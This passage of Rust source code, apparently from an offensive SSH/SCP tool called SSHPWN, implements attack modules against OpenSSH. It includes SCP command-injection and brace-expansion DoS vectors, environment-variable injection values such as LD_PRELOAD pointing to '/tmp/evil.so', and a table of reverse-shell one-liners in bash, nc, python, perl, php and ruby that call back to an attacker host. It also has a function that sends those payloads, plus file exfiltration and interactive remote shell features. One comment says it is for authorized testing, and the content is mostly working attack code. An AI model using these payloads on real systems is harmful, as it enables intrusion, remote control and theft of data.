println!("{}", format!(" scp 'user$(id)@{}:/etc/passwd' /tmp/test", host).dimmed());
|
||||
println!("{}", format!(" scp /etc/passwd '`id`@{}:/tmp/'", host).dimmed());
|
||||
|
||||
println!();
|
||||
println!("{}", "[!] Direct testing requires SCP binary execution".yellow());
|
||||
println!("{}", "[*] Framework identifies vulnerable code path, manual verification required".cyan());
|
||||
|
||||
Ok(true)
|
||||
}
|
||||
|
||||
/// SCP Brace Expansion DoS - Memory exhaustion via exponential expansion
|
||||
///
|
||||
/// Vulnerability: scp.c brace_expand() function can exponentially expand patterns.
|
||||
/// Pattern like {a,b}{c,d}{e,f}... expands to 2^n strings.
|
||||
pub async fn attack_scp_brace_dos(
|
||||
host: &str,
|
||||
port: u16,
|
||||
username: &str,
|
||||
password: Option<&str>,
|
||||
keyfile: Option<&str>,
|
||||
depth: u32,
|
||||
) -> Result<bool> {
|
||||
println!("{}", format!("[*] SCP Brace Expansion DoS on {}", host).cyan());
|
||||
|
||||
// Calculate expansion
|
||||
let expansion_size: u64 = 2u64.pow(depth);
|
||||
println!("{}", format!("[*] Testing depth {} = {} strings", depth, format_number(expansion_size)).cyan());
|
||||
|
||||
// Generate malicious pattern
|
||||
let pattern: String = (0..depth).map(|_| "{a,b}").collect();
|
||||
println!("{}", format!("[VULN] Malicious pattern: {}", pattern).red().bold());
|
||||
|
||||
// This would DoS the client, not server
|
||||
println!();
|
||||
println!("{}", "[!] This is a CLIENT-SIDE DoS vulnerability!".yellow().bold());
|
||||
println!("{}", "[*] Malicious server can send this pattern to exhaust client memory".cyan());
|
||||
|
||||
// Test small expansion to verify server is vulnerable
|
||||
let (_, sess) = create_ssh_session(host, port, username, password, keyfile, DEFAULT_TIMEOUT_SECS)?;
|
||||
|
||||
// Create test pattern on server
|
||||
let small_pattern = "{a,b}{c,d}"; // 4 expansions - safe
|
||||
let cmd = format!(
|
||||
"mkdir -p /tmp/bracetest && cd /tmp/bracetest && touch {} 2>/dev/null; ls /tmp/bracetest/",
|
||||
small_pattern
|
||||
);
|
||||
|
||||
match ssh_exec(&sess, &cmd) {
|
||||
Ok((code, stdout, _)) => {
|
||||
if code == 0 && !stdout.is_empty() {
|
||||
println!("{}", format!("[+] Brace expansion active: {}", stdout.trim()).green());
|
||||
println!("{}", "[VULN] Server/client supports brace expansion - DoS possible".red().bold());
|
||||
}
|
||||
}
|
||||
Err(e) => {
|
||||
println!("{}", format!("[-] Test failed: {}", e).yellow());
|
||||
}
|
||||
}
|
||||
|
||||
// Cleanup
|
||||
let _ = ssh_exec(&sess, "rm -rf /tmp/bracetest");
|
||||
|
||||
println!();
|
||||
println!("{}", "[*] To test DoS (WARNING: may crash client):".cyan());
|
||||
let large_pattern: String = (0..20u32).map(|_| "{a,b}").collect(); // 2^20 = 1M strings
|
||||
println!("{}", format!(" scp '{}@{}:{}' /tmp/", username, host, large_pattern).dimmed());
|
||||
|
||||
Ok(true)
|
||||
}
|
||||
|
||||
/// SCP Command Injection - Inject commands via SCP arguments
|
||||
///
|
||||
/// Vulnerability: scp.c do_cmd() constructs commands passed to ssh.
|
||||
/// Historical vulnerabilities in argument handling allow injection.
|
||||
pub async fn attack_scp_cmd_injection(
|
||||
host: &str,
|
||||
port: u16,
|
||||
username: &str,
|
||||
password: Option<&str>,
|
||||
keyfile: Option<&str>,
|
||||
) -> Result<bool> {
|
||||
println!("{}", format!("[*] SCP Command Injection on {}", host).cyan());
|
||||
|
||||
let (_, sess) = create_ssh_session(host, port, username, password, keyfile, DEFAULT_TIMEOUT_SECS)?;
|
||||
|
||||
// Test vectors that could escape argument handling
|
||||
let injection_vectors = vec![
|
||||
("-oProxyCommand=id", "ProxyCommand injection"),
|
||||
("--rsync-path=id", "rsync-path injection"),
|
||||
("-S /tmp/fake;id", "ControlPath injection"),
|
||||
("user@host:file;id", "Semicolon in path"),
|
||||
("user@host:'$(id)'", "Command substitution in remote path"),
|
||||
];
|
||||
|
||||
println!("{}", "[*] SCP command injection vectors:".cyan());
|
||||
for (vec, desc) in &injection_vectors {
|
||||
println!("{}", format!(" [{}]: {}", desc, vec).red());
|
||||
}
|
||||
|
||||
// Test if server allows unusual filenames
|
||||
let test_filename = "/tmp/test_$(whoami)_file";
|
||||
let cmd = format!(
|
||||
"touch '{}' 2>/dev/null && ls -la /tmp/test_*_file 2>/dev/null",
|
||||
test_filename
|
||||
);
|
||||
|
||||
match ssh_exec(&sess, &cmd) {
|
||||
Ok((_, stdout, _)) => {
|
||||
if !stdout.is_empty() {
|
||||
println!("{}", format!("[*] Server filename handling: {}", stdout.trim()).cyan());
|
||||
}
|
||||
}
|
||||
Err(_) => {}
|
||||
}
|
||||
|
||||
// Cleanup
|
||||
let _ = ssh_exec(&sess, "rm -f /tmp/test_*_file");
|
||||
|
||||
println!();
|
||||
println!("{}", "[*] Manual testing commands:".cyan());
|
||||
println!("{}", format!(" scp -oProxyCommand='id>/tmp/pwn' {}@{}:/etc/passwd /tmp/", username, host).dimmed());
|
||||
println!("{}", format!(" scp '{}@{}:\"$(id)\"' /tmp/", username, host).dimmed());
|
||||
|
||||
Ok(true)
|
||||
}
|
||||
|
||||
/// Prompt helper
|
||||
fn prompt(message: &str) -> Result<String> {
|
||||
print!("{}: ", message);
|
||||
std::io::stdout().flush()?;
|
||||
let mut input = String::new();
|
||||
std::io::stdin().read_line(&mut input)?;
|
||||
Ok(input.trim().to_string())
|
||||
}
|
||||
|
||||
fn prompt_default(message: &str, default: &str) -> Result<String> {
|
||||
print!("{} [{}]: ", message, default);
|
||||
std::io::stdout().flush()?;
|
||||
let mut input = String::new();
|
||||
std::io::stdin().read_line(&mut input)?;
|
||||
let trimmed = input.trim();
|
||||
if trimmed.is_empty() {
|
||||
Ok(default.to_string())
|
||||
} else {
|
||||
Ok(trimmed.to_string())
|
||||
}
|
||||
}
|
||||
|
||||
fn prompt_optional(message: &str) -> Result<Option<String>> {
|
||||
print!("{} (leave empty to skip): ", message);
|
||||
std::io::stdout().flush()?;
|
||||
let mut input = String::new();
|
||||
std::io::stdin().read_line(&mut input)?;
|
||||
let trimmed = input.trim();
|
||||
if trimmed.is_empty() {
|
||||
Ok(None)
|
||||
} else {
|
||||
Ok(Some(trimmed.to_string()))
|
||||
}
|
||||
}
|
||||
|
||||
/// Main entry point
|
||||
pub async fn run(target: &str) -> Result<()> {
|
||||
display_banner();
|
||||
|
||||
let host = normalize_target(target);
|
||||
println!("{}", format!("[*] Target: {}", host).cyan());
|
||||
|
||||
// Get connection parameters
|
||||
let port: u16 = prompt_default("SSH Port", "22")?.parse().unwrap_or(22);
|
||||
|
||||
println!();
|
||||
println!("{}", "Select attack mode:".yellow().bold());
|
||||
println!(" 1. Path Traversal Test (requires auth)");
|
||||
println!(" 2. Username Shell Injection Analysis (no auth)");
|
||||
println!(" 3. Brace Expansion DoS Test (requires auth)");
|
||||
println!(" 4. Command Injection Analysis (requires auth)");
|
||||
println!(" 5. Run All Attacks");
|
||||
println!();
|
||||
|
||||
let mode = prompt_default("Attack mode", "2")?;
|
||||
|
||||
// Mode 2 doesn't require auth
|
||||
if mode == "2" {
|
||||
attack_scp_username_injection(&host, port).await?;
|
||||
return Ok(());
|
||||
}
|
||||
|
||||
// Other modes require authentication
|
||||
let username = prompt("Username")?;
|
||||
if username.is_empty() {
|
||||
return Err(anyhow!("Username is required"));
|
||||
}
|
||||
|
||||
let password = prompt_optional("Password")?;
|
||||
let keyfile = prompt_optional("SSH Key File Path")?;
|
||||
|
||||
if password.is_none() && keyfile.is_none() {
|
||||
return Err(anyhow!("Either password or keyfile is required"));
|
||||
}
|
||||
|
||||
let password_ref = password.as_deref();
|
||||
let keyfile_ref = keyfile.as_deref();
|
||||
|
||||
match mode.as_str() {
|
||||
"1" => {
|
||||
attack_scp_traversal(&host, port, &username, password_ref, keyfile_ref).await?;
|
||||
}
|
||||
"3" => {
|
||||
let depth: u32 = prompt_default("Brace expansion depth", "10")?.parse().unwrap_or(10);
|
||||
attack_scp_brace_dos(&host, port, &username, password_ref, keyfile_ref, depth).await?;
|
||||
}
|
||||
"4" => {
|
||||
attack_scp_cmd_injection(&host, port, &username, password_ref, keyfile_ref).await?;
|
||||
}
|
||||
"5" | _ => {
|
||||
println!();
|
||||
println!("{}", "=== Running All SCP Attacks ===".yellow().bold());
|
||||
|
||||
println!();
|
||||
println!("{}", "--- Attack 1: Path Traversal ---".cyan());
|
||||
let _ = attack_scp_traversal(&host, port, &username, password_ref, keyfile_ref).await;
|
||||
|
||||
println!();
|
||||
println!("{}", "--- Attack 2: Username Injection ---".cyan());
|
||||
let _ = attack_scp_username_injection(&host, port).await;
|
||||
|
||||
println!();
|
||||
println!("{}", "--- Attack 3: Brace Expansion DoS ---".cyan());
|
||||
let _ = attack_scp_brace_dos(&host, port, &username, password_ref, keyfile_ref, 10).await;
|
||||
|
||||
println!();
|
||||
println!("{}", "--- Attack 4: Command Injection ---".cyan());
|
||||
let _ = attack_scp_cmd_injection(&host, port, &username, password_ref, keyfile_ref).await;
|
||||
}
|
||||
}
|
||||
|
||||
println!();
|
||||
println!("{}", "[*] SCP attack module complete".green());
|
||||
|
||||
Ok(())
|
||||
}
|
||||
|
||||
@@ -0,0 +1,605 @@
|
||||
//! SSHPWN Session Attack Module
|
||||
//!
|
||||
//! Based on OpenSSH 10.0p1 vulnerability analysis
|
||||
//!
|
||||
//! SESSION VULNERABILITIES (session.c):
|
||||
//! - do_exec() - Forced command bypass potential
|
||||
//! - do_setup_env() - Environment variable injection (HIGH)
|
||||
//! - do_child() - Privilege separation boundary
|
||||
//!
|
||||
//! SSHD-SESSION VULNERABILITIES (sshd-session.c):
|
||||
//! - privsep_preauth() - FD leakage window between fork/closefrom
|
||||
//! - privsep_postauth() - Privilege retention on DISABLE_FD_PASSING platforms
|
||||
//!
|
||||
//! For authorized penetration testing only.
|
||||
|
||||
use anyhow::{anyhow, Context, Result};
|
||||
use colored::*;
|
||||
use ssh2::Session;
|
||||
use std::{
|
||||
collections::HashMap,
|
||||
io::{Read, Write},
|
||||
net::TcpStream,
|
||||
path::Path,
|
||||
time::Duration,
|
||||
};
|
||||
|
||||
const DEFAULT_TIMEOUT_SECS: u64 = 30;
|
||||
|
||||
fn display_banner() {
|
||||
println!("{}", "╔═══════════════════════════════════════════════════════════════════╗".cyan());
|
||||
println!("{}", "║ SSHPWN - Session Attack Module ║".cyan());
|
||||
println!("{}", "║ Based on OpenSSH session.c vulnerability analysis ║".cyan());
|
||||
println!("{}", "║ ║".cyan());
|
||||
println!("{}", "║ Attack Modes: ║".cyan());
|
||||
println!("{}", "║ 1. Environment Variable Injection (do_setup_env) ║".cyan());
|
||||
println!("{}", "║ 2. Command Execution ║".cyan());
|
||||
println!("{}", "║ 3. Interactive Shell ║".cyan());
|
||||
println!("{}", "║ 4. Reverse Shell ║".cyan());
|
||||
println!("{}", "║ 5. File Upload ║".cyan());
|
||||
println!("{}", "║ 6. File Download ║".cyan());
|
||||
println!("{}", "╚═══════════════════════════════════════════════════════════════════╝".cyan());
|
||||
println!();
|
||||
}
|
||||
|
||||
/// Normalize target for connection
|
||||
fn normalize_target(target: &str) -> String {
|
||||
let trimmed = target.trim();
|
||||
if trimmed.starts_with('[') && trimmed.contains(']') {
|
||||
trimmed.to_string()
|
||||
} else if trimmed.contains(':') && !trimmed.contains('.') {
|
||||
format!("[{}]", trimmed)
|
||||
} else {
|
||||
trimmed.to_string()
|
||||
}
|
||||
}
|
||||
|
||||
/// Create SSH session with authentication
|
||||
fn create_ssh_session(
|
||||
host: &str,
|
||||
port: u16,
|
||||
username: &str,
|
||||
password: Option<&str>,
|
||||
keyfile: Option<&str>,
|
||||
timeout_secs: u64,
|
||||
) -> Result<(TcpStream, Session)> {
|
||||
let addr = format!("{}:{}", host, port);
|
||||
let tcp = TcpStream::connect_timeout(
|
||||
&addr.parse().context("Invalid address")?,
|
||||
Duration::from_secs(timeout_secs),
|
||||
).context("Connection failed")?;
|
||||
|
||||
tcp.set_read_timeout(Some(Duration::from_secs(timeout_secs)))?;
|
||||
tcp.set_write_timeout(Some(Duration::from_secs(timeout_secs)))?;
|
||||
|
||||
let mut sess = Session::new()?;
|
||||
sess.set_tcp_stream(tcp.try_clone()?);
|
||||
sess.handshake()?;
|
||||
|
||||
// Authenticate
|
||||
if let Some(key) = keyfile {
|
||||
sess.userauth_pubkey_file(username, None, Path::new(key), password)?;
|
||||
} else if let Some(pass) = password {
|
||||
sess.userauth_password(username, pass)?;
|
||||
} else {
|
||||
return Err(anyhow!("No authentication method provided"));
|
||||
}
|
||||
|
||||
if !sess.authenticated() {
|
||||
return Err(anyhow!("Authentication failed"));
|
||||
}
|
||||
|
||||
Ok((tcp, sess))
|
||||
}
|
||||
|
||||
/// Execute command over SSH
|
||||
fn ssh_exec(sess: &Session, cmd: &str, _timeout: u64) -> Result<(i32, String, String)> {
|
||||
let mut channel = sess.channel_session()?;
|
||||
channel.exec(cmd)?;
|
||||
|
||||
let mut stdout = String::new();
|
||||
let mut stderr = String::new();
|
||||
|
||||
// Set non-blocking for timeout handling
|
||||
sess.set_blocking(true);
|
||||
|
||||
channel.read_to_string(&mut stdout)?;
|
||||
channel.stderr().read_to_string(&mut stderr)?;
|
||||
|
||||
channel.wait_close()?;
|
||||
let exit_code = channel.exit_status()?;
|
||||
|
||||
Ok((exit_code, stdout, stderr))
|
||||
}
|
||||
|
||||
/// Session Environment Variable Injection
|
||||
///
|
||||
/// Vulnerability: session.c do_setup_env() copies environment variables
|
||||
/// from various sources including GSSAPI and client requests.
|
||||
pub async fn attack_session_env_injection(
|
||||
host: &str,
|
||||
port: u16,
|
||||
username: &str,
|
||||
password: Option<&str>,
|
||||
keyfile: Option<&str>,
|
||||
custom_env: Option<HashMap<String, String>>,
|
||||
) -> Result<bool> {
|
||||
println!("{}", format!("[*] Session Environment Injection on {}", host).cyan());
|
||||
|
||||
let (_, sess) = create_ssh_session(host, port, username, password, keyfile, DEFAULT_TIMEOUT_SECS)?;
|
||||
|
||||
println!("{}", "[*] Testing environment variable acceptance...".cyan());
|
||||
|
||||
// Common attack vectors
|
||||
let env_injection_tests: Vec<(&str, &str)> = vec![
|
||||
("LD_PRELOAD", "/tmp/evil.so"),
|
||||
("LD_LIBRARY_PATH", "/tmp"),
|
||||
("PATH", "/tmp:$PATH"),
|
||||
("BASH_ENV", "/tmp/evil.sh"),
|
||||
("ENV", "/tmp/evil.sh"),
|
||||
("SSH_ORIGINAL_COMMAND", "id; cat /etc/passwd"),
|
||||
("LC_ALL", "$(id)"),
|
||||
("TERM", "$(id)"),
|
||||
];
|
||||
|
||||
let mut custom_tests: Vec<(String, String)> = Vec::new();
|
||||
if let Some(ref env_map) = custom_env {
|
||||
for (k, v) in env_map {
|
||||
custom_tests.push((k.clone(), v.clone()));
|
||||
}
|
||||
}
|
||||
|
||||
// Check current values
|
||||
for (var, _val) in &env_injection_tests {
|
||||
let cmd = format!("echo ${}", var);
|
||||
match ssh_exec(&sess, &cmd, 10) {
|
||||
Ok((_, stdout, _)) => {
|
||||
println!("{}", format!(" {}: current='{}'", var, stdout.trim()).dimmed());
|
||||
}
|
||||
Err(_) => {}
|
||||
}
|
||||
}
|
||||
|
||||
println!();
|
||||
println!("{}", "[*] Testing injection vectors...".cyan());
|
||||
|
||||
// These require AcceptEnv to be configured on server
|
||||
println!("{}", "[!] AcceptEnv must allow these variables for injection to work".yellow());
|
||||
println!("{}", "[*] Check server config: grep AcceptEnv /etc/ssh/sshd_config".dimmed());
|
||||
|
||||
// Test common permitted env vars
|
||||
let permitted_test = "env | grep -E '^(LANG|LC_|SSH_)' | head -10";
|
||||
match ssh_exec(&sess, permitted_test, 10) {
|
||||
Ok((_, stdout, _)) => {
|
||||
if !stdout.is_empty() {
|
||||
println!("{}", "[+] Accepted environment variables:".green());
|
||||
println!("{}", stdout);
|
||||
}
|
||||
}
|
||||
Err(_) => {}
|
||||
}
|
||||
|
||||
// Test if we can see SSH_ORIGINAL_COMMAND
|
||||
let cmd = "echo SSH_ORIGINAL_COMMAND=$SSH_ORIGINAL_COMMAND";
|
||||
match ssh_exec(&sess, cmd, 10) {
|
||||
Ok((_, stdout, _)) => {
|
||||
println!("{}", format!("[*] SSH_ORIGINAL_COMMAND test: {}", stdout.trim()).cyan());
|
||||
}
|
||||
Err(_) => {}
|
||||
}
|
||||
|
||||
Ok(true)
|
||||
}
|
||||
|
||||
/// Execute command on target
|
||||
pub async fn attack_exec(
|
||||
host: &str,
|
||||
port: u16,
|
||||
username: &str,
|
||||
password: Option<&str>,
|
||||
keyfile: Option<&str>,
|
||||
command: &str,
|
||||
timeout: u64,
|
||||
) -> Result<bool> {
|
||||
let (_, sess) = create_ssh_session(host, port, username, password, keyfile, DEFAULT_TIMEOUT_SECS)?;
|
||||
|
||||
println!("{}", format!("[+] Authenticated to {} as {}", host, username).green());
|
||||
|
||||
match ssh_exec(&sess, command, timeout) {
|
||||
Ok((code, stdout, stderr)) => {
|
||||
println!();
|
||||
println!("{}", format!("[{}] Exit: {}", host, code).cyan());
|
||||
if !stdout.is_empty() {
|
||||
println!("{}", stdout);
|
||||
}
|
||||
if !stderr.is_empty() {
|
||||
println!("{}", stderr.red());
|
||||
}
|
||||
Ok(code == 0)
|
||||
}
|
||||
Err(e) => {
|
||||
println!("{}", format!("[-] Command execution failed: {}", e).red());
|
||||
Ok(false)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
/// Reverse shell payloads
|
||||
fn get_reverse_shell_payloads() -> HashMap<&'static str, &'static str> {
|
||||
let mut payloads = HashMap::new();
|
||||
payloads.insert("bash", "bash -i >& /dev/tcp/{lhost}/{lport} 0>&1");
|
||||
payloads.insert("bash_alt", "/bin/bash -c \"bash -i >& /dev/tcp/{lhost}/{lport} 0>&1\"");
|
||||
payloads.insert("nc", "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {lhost} {lport} >/tmp/f");
|
||||
payloads.insert("python", "python -c 'import socket,subprocess,os;s=socket.socket();s.connect((\"{lhost}\",{lport}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/sh\",\"-i\"])'");
|
||||
payloads.insert("python3", "python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect((\"{lhost}\",{lport}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/sh\",\"-i\"])'");
|
||||
payloads.insert("perl", "perl -e 'use Socket;$i=\"{lhost}\";$p={lport};socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));connect(S,sockaddr_in($p,inet_aton($i)));open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");'");
|
||||
payloads.insert("php", "php -r '$s=fsockopen(\"{lhost}\",{lport});exec(\"/bin/sh -i <&3 >&3 2>&3\");'");
|
||||
payloads.insert("ruby", "ruby -rsocket -e's=TCPSocket.open(\"{lhost}\",{lport}).to_i;exec sprintf(\"/bin/sh -i <&%d >&%d 2>&%d\",s,s,s)'");
|
||||
payloads
|
||||
}
|
||||
|
||||
/// Send reverse shell payload
|
||||
pub async fn attack_revshell(
|
||||
host: &str,
|
||||
port: u16,
|
||||
username: &str,
|
||||
password: Option<&str>,
|
||||
keyfile: Option<&str>,
|
||||
lhost: &str,
|
||||
lport: u16,
|
||||
payload_type: &str,
|
||||
) -> Result<bool> {
|
||||
let payloads = get_reverse_shell_payloads();
|
||||
|
||||
let payload_template = payloads.get(payload_type)
|
||||
.ok_or_else(|| anyhow!("Unknown payload type: {}. Available: {}", payload_type,
|
||||
payloads.keys().cloned().collect::<Vec<_>>().join(", ")))?;
|
||||
|
||||
let cmd = payload_template
|
||||
.replace("{lhost}", lhost)
|
||||
.replace("{lport}", &lport.to_string());
|
||||
|
||||
println!("{}", format!("[*] Payload ({}): ", payload_type).cyan());
|
||||
println!(" {}", cmd);
|
||||
println!();
|
||||
println!("{}", format!("[!] Start listener: nc -lvnp {}", lport).yellow().bold());
|
||||
println!();
|
||||
|
||||
print!("Press Enter to send payload...");
|
||||
std::io::stdout().flush()?;
|
||||
let mut input = String::new();
|
||||
std::io::stdin().read_line(&mut input)?;
|
||||
|
||||
attack_exec(host, port, username, password, keyfile, &cmd, 5).await
|
||||
}
|
||||
|
||||
/// Upload file via SFTP
|
||||
pub async fn attack_upload(
|
||||
host: &str,
|
||||
port: u16,
|
||||
username: &str,
|
||||
password: Option<&str>,
|
||||
keyfile: Option<&str>,
|
||||
local_path: &str,
|
||||
remote_path: &str,
|
||||
) -> Result<bool> {
|
||||
let (_, sess) = create_ssh_session(host, port, username, password, keyfile, DEFAULT_TIMEOUT_SECS)?;
|
||||
|
||||
let sftp = sess.sftp().context("SFTP initialization failed")?;
|
||||
|
||||
// Read local file
|
||||
let content = std::fs::read(local_path)
|
||||
.context(format!("Failed to read local file: {}", local_path))?;
|
||||
|
||||
// Write to remote
|
||||
let mut remote_file = sftp.create(Path::new(remote_path))?;
|
||||
remote_file.write_all(&content)?;
|
||||
|
||||
println!("{}", format!("[+] Uploaded {} -> {}", local_path, remote_path).green());
|
||||
|
||||
Ok(true)
|
||||
}
|
||||
|
||||
/// Download file via SFTP
|
||||
pub async fn attack_download(
|
||||
host: &str,
|
||||
port: u16,
|
||||
username: &str,
|
||||
password: Option<&str>,
|
||||
keyfile: Option<&str>,
|
||||
remote_path: &str,
|
||||
local_path: &str,
|
||||
) -> Result<bool> {
|
||||
let (_, sess) = create_ssh_session(host, port, username, password, keyfile, DEFAULT_TIMEOUT_SECS)?;
|
||||
|
||||
let sftp = sess.sftp().context("SFTP initialization failed")?;
|
||||
|
||||
// Read from remote
|
||||
let mut remote_file = sftp.open(Path::new(remote_path))?;
|
||||
let mut content = Vec::new();
|
||||
remote_file.read_to_end(&mut content)?;
|
||||
|
||||
// Write to local
|
||||
std::fs::write(local_path, &content)
|
||||
.context(format!("Failed to write local file: {}", local_path))?;
|
||||
|
||||
println!("{}", format!("[+] Downloaded {} -> {}", remote_path, local_path).green());
|
||||
|
||||
Ok(true)
|
||||
}
|
||||
|
||||
/// Interactive shell - continuous command execution loop
|
||||
pub async fn attack_interactive_shell(
|
||||
host: &str,
|
||||
port: u16,
|
||||
username: &str,
|
||||
password: Option<&str>,
|
||||
keyfile: Option<&str>,
|
||||
) -> Result<bool> {
|
||||
let (_, sess) = create_ssh_session(host, port, username, password, keyfile, DEFAULT_TIMEOUT_SECS)?;
|
||||
|
||||
println!("{}", format!("[PWNED] Interactive shell on {}:{}", host, port).red().bold());
|
||||
println!("{}", "[*] Type 'exit' or 'quit' to disconnect".cyan());
|
||||
println!("{}", "[*] Type '!upload <local> <remote>' to upload files".cyan());
|
||||
println!("{}", "[*] Type '!download <remote> <local>' to download files".cyan());
|
||||
println!();
|
||||
|
||||
// Get initial info
|
||||
if let Ok((_, whoami, _)) = ssh_exec(&sess, "whoami", 5) {
|
||||
if let Ok((_, hostname, _)) = ssh_exec(&sess, "hostname", 5) {
|
||||
println!("{}", format!("[*] Logged in as: {}@{}", whoami.trim(), hostname.trim()).green());
|
||||
}
|
||||
}
|
||||
|
||||
// Get initial working directory
|
||||
let mut cwd = String::from("~");
|
||||
if let Ok((_, pwd, _)) = ssh_exec(&sess, "pwd", 5) {
|
||||
cwd = pwd.trim().to_string();
|
||||
}
|
||||
|
||||
loop {
|
||||
// Print prompt
|
||||
print!("{}", format!("{}@{}:{} $ ", username, host, cwd).green());
|
||||
std::io::stdout().flush()?;
|
||||
|
||||
// Read command
|
||||
let mut input = String::new();
|
||||
if std::io::stdin().read_line(&mut input).is_err() {
|
||||
break;
|
||||
}
|
||||
|
||||
let cmd = input.trim();
|
||||
|
||||
if cmd.is_empty() {
|
||||
continue;
|
||||
}
|
||||
|
||||
// Handle special commands
|
||||
if cmd == "exit" || cmd == "quit" {
|
||||
println!("{}", "[*] Disconnecting...".cyan());
|
||||
break;
|
||||
}
|
||||
|
||||
// Handle file upload
|
||||
if cmd.starts_with("!upload ") {
|
||||
let parts: Vec<&str> = cmd.splitn(3, ' ').collect();
|
||||
if parts.len() == 3 {
|
||||
let local_path = parts[1];
|
||||
let remote_path = parts[2];
|
||||
match sess.sftp() {
|
||||
Ok(sftp) => {
|
||||
match std::fs::read(local_path) {
|
||||
Ok(content) => {
|
||||
match sftp.create(std::path::Path::new(remote_path)) {
|
||||
Ok(mut f) => {
|
||||
if f.write_all(&content).is_ok() {
|
||||
println!("{}", format!("[+] Uploaded {} -> {}", local_path, remote_path).green());
|
||||
} else {
|
||||
println!("{}", "[-] Write failed".red());
|
||||
}
|
||||
}
|
||||
Err(e) => println!("{}", format!("[-] Create failed: {}", e).red()),
|
||||
}
|
||||
}
|
||||
Err(e) => println!("{}", format!("[-] Read local file failed: {}", e).red()),
|
||||
}
|
||||
}
|
||||
Err(e) => println!("{}", format!("[-] SFTP failed: {}", e).red()),
|
||||
}
|
||||
} else {
|
||||
println!("{}", "Usage: !upload <local_path> <remote_path>".yellow());
|
||||
}
|
||||
continue;
|
||||
}
|
||||
|
||||
// Handle file download
|
||||
if cmd.starts_with("!download ") {
|
||||
let parts: Vec<&str> = cmd.splitn(3, ' ').collect();
|
||||
if parts.len() == 3 {
|
||||
let remote_path = parts[1];
|
||||
let local_path = parts[2];
|
||||
match sess.sftp() {
|
||||
Ok(sftp) => {
|
||||
match sftp.open(std::path::Path::new(remote_path)) {
|
||||
Ok(mut f) => {
|
||||
let mut content = Vec::new();
|
||||
if f.read_to_end(&mut content).is_ok() {
|
||||
if std::fs::write(local_path, &content).is_ok() {
|
||||
println!("{}", format!("[+] Downloaded {} -> {}", remote_path, local_path).green());
|
||||
} else {
|
||||
println!("{}", "[-] Write local file failed".red());
|
||||
}
|
||||
} else {
|
||||
println!("{}", "[-] Read remote file failed".red());
|
||||
}
|
||||
}
|
||||
Err(e) => println!("{}", format!("[-] Open failed: {}", e).red()),
|
||||
}
|
||||
}
|
||||
Err(e) => println!("{}", format!("[-] SFTP failed: {}", e).red()),
|
||||
}
|
||||
} else {
|
||||
println!("{}", "Usage: !download <remote_path> <local_path>".yellow());
|
||||
}
|
||||
continue;
|
||||
}
|
||||
|
||||
// Handle cd command specially to track cwd
|
||||
if cmd.starts_with("cd ") || cmd == "cd" {
|
||||
let new_dir = if cmd == "cd" { "~" } else { &cmd[3..] };
|
||||
let check_cmd = format!("cd {} && pwd", new_dir);
|
||||
match ssh_exec(&sess, &check_cmd, 10) {
|
||||
Ok((code, stdout, _)) => {
|
||||
if code == 0 {
|
||||
cwd = stdout.trim().to_string();
|
||||
} else {
|
||||
println!("{}", format!("cd: {}: No such directory", new_dir).red());
|
||||
}
|
||||
}
|
||||
Err(e) => println!("{}", format!("[-] Error: {}", e).red()),
|
||||
}
|
||||
continue;
|
||||
}
|
||||
|
||||
// Execute regular command (prepend cd to maintain directory context)
|
||||
let full_cmd = format!("cd {} && {}", cwd, cmd);
|
||||
match ssh_exec(&sess, &full_cmd, 60) {
|
||||
Ok((code, stdout, stderr)) => {
|
||||
if !stdout.is_empty() {
|
||||
print!("{}", stdout);
|
||||
}
|
||||
if !stderr.is_empty() {
|
||||
print!("{}", stderr.red());
|
||||
}
|
||||
if code != 0 && stdout.is_empty() && stderr.is_empty() {
|
||||
println!("{}", format!("Command exited with code: {}", code).yellow());
|
||||
}
|
||||
}
|
||||
Err(e) => println!("{}", format!("[-] Error: {}", e).red()),
|
||||
}
|
||||
}
|
||||
|
||||
println!("{}", "[*] Session closed".cyan());
|
||||
Ok(true)
|
||||
}
|
||||
|
||||
/// Prompt helper
|
||||
fn prompt(message: &str) -> Result<String> {
|
||||
print!("{}: ", message);
|
||||
std::io::stdout().flush()?;
|
||||
let mut input = String::new();
|
||||
std::io::stdin().read_line(&mut input)?;
|
||||
Ok(input.trim().to_string())
|
||||
}
|
||||
|
||||
fn prompt_default(message: &str, default: &str) -> Result<String> {
|
||||
print!("{} [{}]: ", message, default);
|
||||
std::io::stdout().flush()?;
|
||||
let mut input = String::new();
|
||||
std::io::stdin().read_line(&mut input)?;
|
||||
let trimmed = input.trim();
|
||||
if trimmed.is_empty() {
|
||||
Ok(default.to_string())
|
||||
} else {
|
||||
Ok(trimmed.to_string())
|
||||
}
|
||||
}
|
||||
|
||||
fn prompt_optional(message: &str) -> Result<Option<String>> {
|
||||
print!("{} (leave empty to skip): ", message);
|
||||
std::io::stdout().flush()?;
|
||||
let mut input = String::new();
|
||||
std::io::stdin().read_line(&mut input)?;
|
||||
let trimmed = input.trim();
|
||||
if trimmed.is_empty() {
|
||||
Ok(None)
|
||||
} else {
|
||||
Ok(Some(trimmed.to_string()))
|
||||
}
|
||||
}
|
||||
|
||||
/// Main entry point
|
||||
pub async fn run(target: &str) -> Result<()> {
|
||||
display_banner();
|
||||
|
||||
let host = normalize_target(target);
|
||||
println!("{}", format!("[*] Target: {}", host).cyan());
|
||||
|
||||
// Get connection parameters
|
||||
let port: u16 = prompt_default("SSH Port", "22")?.parse().unwrap_or(22);
|
||||
let username = prompt("Username")?;
|
||||
if username.is_empty() {
|
||||
return Err(anyhow!("Username is required"));
|
||||
}
|
||||
|
||||
let password = prompt_optional("Password")?;
|
||||
let keyfile = prompt_optional("SSH Key File Path")?;
|
||||
|
||||
if password.is_none() && keyfile.is_none() {
|
||||
return Err(anyhow!("Either password or keyfile is required"));
|
||||
}
|
||||
|
||||
println!();
|
||||
println!("{}", "Select attack mode:".yellow().bold());
|
||||
println!(" 1. Environment Variable Injection Test");
|
||||
println!(" 2. Execute Command");
|
||||
println!(" 3. Interactive Shell");
|
||||
println!(" 4. Reverse Shell");
|
||||
